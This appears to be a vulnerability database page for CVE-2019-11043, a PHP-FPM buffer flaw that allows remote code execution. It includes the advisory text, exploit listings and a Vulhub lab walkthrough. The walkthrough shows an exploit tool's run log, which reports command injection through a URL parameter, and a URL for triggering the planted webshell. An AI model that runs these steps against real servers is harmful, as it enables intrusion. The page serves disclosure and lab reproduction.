9.8 / 10

In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.

Weakness: Out-of-bounds Write

The software writes data past the end, or before the beginning, of the intended buffer.

Published: 2019-10-28

Vulnerable Products

Community Advisory

This section is open source, for any additional information that enhances or clarifies the official advisory above.

Improve Advisory

CVE-2019-11043 Exploits (25)

Show all exploits (+15):

CVE-2019-11043 Vulnerable Docker Environment

Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.

Get Vulhub Docker

PHP-FPM Remote Command Execution (CVE-2019-11043)

There is a PHP remote code execution 0-Day discovered in Real World CTF 2019 Quals.

Real World CTF 2019 Quals is a CTF challenge which was organized by Chaitin Tech in China.



Environment setup

Start a vulnerable PHP server through following command:

docker-compose up -d

After the environment is started, you can see the default page at http://your-ip:8080/index.php.

Vulnerability Reproduce

Use this tool to reproduce the vulnerability,

$ go run . "http://your-ip:8080/index.php"
2019/10/23 19:41:00 Base status code is 200
2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate
2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect
2019/10/23 19:41:02 Trying to set "session.auto_start=0"...
2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS
2019/10/23 19:41:02 Performing attack using php.ini settings...
2019/10/23 19:41:02 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/23 19:41:02 Trying to cleanup /tmp/a...
2019/10/23 19:41:02 Done!

Something is show that the process is finished successfully:

A webshell is written in the background of PHP-FPM, visit http://your-ip:8080/index.php?a=id to trigger RCE:

You should notice that only part of the PHP-FPM child process is polluted, so please try a few more times to execute the command.

Bug Bounty

Nextcloud: Docker image with FPM is vulnerable to CVE-2019-11043

submitted by beched over 1 year ago
publicly disclosed 11 months ago

PHP (IBB): CVE-2019-11043: a buffer underflow in fpm_main.c can lead to RCE in php-fpm

submitted by neex over 1 year ago
publicly disclosed 3 months ago

Official CVE References

View references (26)